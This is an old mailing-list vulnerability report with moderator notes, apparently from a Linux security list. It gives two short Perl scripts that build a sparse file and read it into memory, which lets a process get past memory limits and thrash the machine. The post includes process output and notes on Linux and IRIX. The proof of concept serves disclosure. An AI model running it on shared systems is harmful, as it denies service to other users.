simple perl script bypasses limits

[dlai bacon esd sgi com (David Lai)]

Any user with shell access, or with access to upload a cgi
script can exploit this to make machine thrash badly.

Seems to circumvent any limits in the kernel

Here are my settings
dlai whale home org:/home/dlai?limit
cputime         unlimited
filesize        20000 kbytes
datasize        8192 kbytes
stacksize       8192 kbytes
coredumpsize    1000000 kbytes
memoryuse       8192 kbytes
descriptors     1024 
memorylocked    8192 kbytes
maxproc         256 

Create a file with a huge hole (can be 4Gb if needed):
   [mod: 2Gb on linux. :-(   -- REW]

#!/usr/bin/perl
system("touch xxx");
open(XXX,"+<xxx");
seek(XXX,90000000,0);
print XXX "A B C\n";
truncate (XXX, 4294967295);
close(XXX);

This one creates a file size 90Megs, but its really sparse.  
"limit filesize" has no effect, this operation succeeds.  Understandable
since the file really only occupies a few blocks on the disk.

Next, create a script that reads the file:

#!/usr/bin/perl
open(XXX,"<xxx");
@abc=<XXX>;
print "read\n";
exit;

Run it, it will circumvent any limit settings on datasize, stacksize,
memoryuse, memorylocked.  It really allocates 90Mb and uses it even
though my limits are set at 8Mb.


ps shows:

 6460 dlai      12   0 53608 8156    72 D       0 34.2 43.4   1:14 readx.pl

(I killed it before it ate all my swap - machine was thrashing badly at
this point).


And another note, on IRIX, the [create file] script fails to run ; kernel
detects limit for filesize exceeded:

? x.pl
File size limit exceeded (core dumped)

[mod: Postscriptum in separate message merged by
moderator.... Verified on a 2.0 system -- REW]